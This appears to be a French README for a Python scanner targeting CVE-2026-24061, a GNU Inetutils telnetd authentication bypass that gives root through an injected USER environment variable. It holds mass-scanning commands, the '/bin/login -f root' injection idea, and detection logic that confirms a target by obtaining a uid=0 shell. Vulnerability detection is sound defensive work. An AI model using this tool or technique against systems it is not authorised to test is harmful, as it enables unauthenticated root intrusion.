
GNU Inetutils telnet vulnérabilité de contournement d'authentification à distance (CVE-2026-24061), cette vulnérabilité provient d'un traitement inapproprié des variables d'environnement dans le composant telnetd de GNU Inetutils. Un attaquant peut exploiter cette vulnérabilité en construisant une variable d'environnement USER malveillante et en l'envoyant au service telnet affecté, déclenchant ainsi le mécanisme de contournement d'authentification, permettant d'obtenir directement les privilèges root sans mot de passe.
Il s'agit d'un outil de détection avancé pour le contournement d'authentification GNU Inetutils Telnetd (CVE-2026-24061). Ce score CVSS de 9,8 permet à un attaquant d'obtenir un accès root sans authentification via l'injection de variables d'environnement.
# Prise en charge des couleurs sous Windows
pip install colorama
python3 CVE-2026-24061.py 192.168.1.1
# Créer un fichier de cibles
echo "192.168.1.1" > targets.txt
echo "192.168.1.2" >> targets.txt
echo "192.168.1.3" >> targets.txt
# Exécuter la détection par lots
python3 CVE-2026-24061.py -f targets.txt
# Spécifier le port et le nombre de threads
python3 CVE-2026-24061.py -f targets.txt -p 23 -t 50
# Mode détaillé et enregistrement des résultats
python3 CVE-2026-24061.py -f targets.txt -o results.txt -v
# Délai d'expiration personnalisé
python3 CVE-2026-24061.py -f targets.txt -T 10
| État | Indicateur | Couleur | Description |
|---|---|---|---|
| Vulnérabilité confirmée | ✓ | 🔴 Rouge | uid=0 et gid=0 détectés simultanément |
| Très suspect | ⚠ | 🟡 Jaune | uid=0 et utilisateur root détectés |
| À confirmer | ? | 🔵 Cyan | Seul uid=0 détecté, vérification manuelle requise |
| Sécurisé | ✗ | 🟢 Vert | Aucune caractéristique de vulnérabilité détectée |
| Échec de connexion | ✗ | ⚪ Gris | Problème de connexion réseau |
[✓ Vulnérabilité confirmée] [14:30:25] 192.168.1.1:23 └─ Vulnérabilité confirmée | uid=0/gid=0 | Bannière: Ubuntu 20.04
[⚠ Très suspect] [14:30:26] 192.168.1.2:23 └─ Très suspect | uid=0 + root | Bannière: Debian 12
[? À confirmer] [14:30:27] 192.168.1.3:23 └─ uid=0 détecté mais autres conditions de confirmation manquantes
| Paramètre | Abréviation | Valeur par défaut | Description |
|---|---|---|---|
--file | -f | - | Chemin du fichier de cibles |
--port | -p | 23 | Port cible |
--threads | -t | 50 | Nombre de threads simultanés |
--timeout | -T | 8 | Délai d'expiration par cible (secondes) |
--output | -o | - | Fichier de sortie des résultats |
--verbose | -v | False | Mode de sortie détaillé |
--user | -u | root | Nom d'utilisateur d'authentification |
Le fichier de cibles prend en charge les formats suivants : 192.168.1.1 192.168.1.2:2323 # Port spécifié 192.168.1.0/24 # Format CIDR 10.0.0.1-10.0.0.10 # Plage d'adresses IP
Cette vulnérabilité exploite le défaut de gestion des variables d'environnement dans GNU Inetutils Telnetd :
/bin/login -f root# Conditions de détection multiples
uid_0_detected = "uid=0" in response_text
gid_0_detected = "gid=0" in response_text
root_detected = "root" in response_text
# Logique de confirmation de vulnérabilité
if uid_0_detected and gid_0_detected:
return "Vulnérabilité confirmée"
elif uid_0_detected and root_detected:
return "Très suspect"
elif uid_0_detected:
return "À confirmer"
·


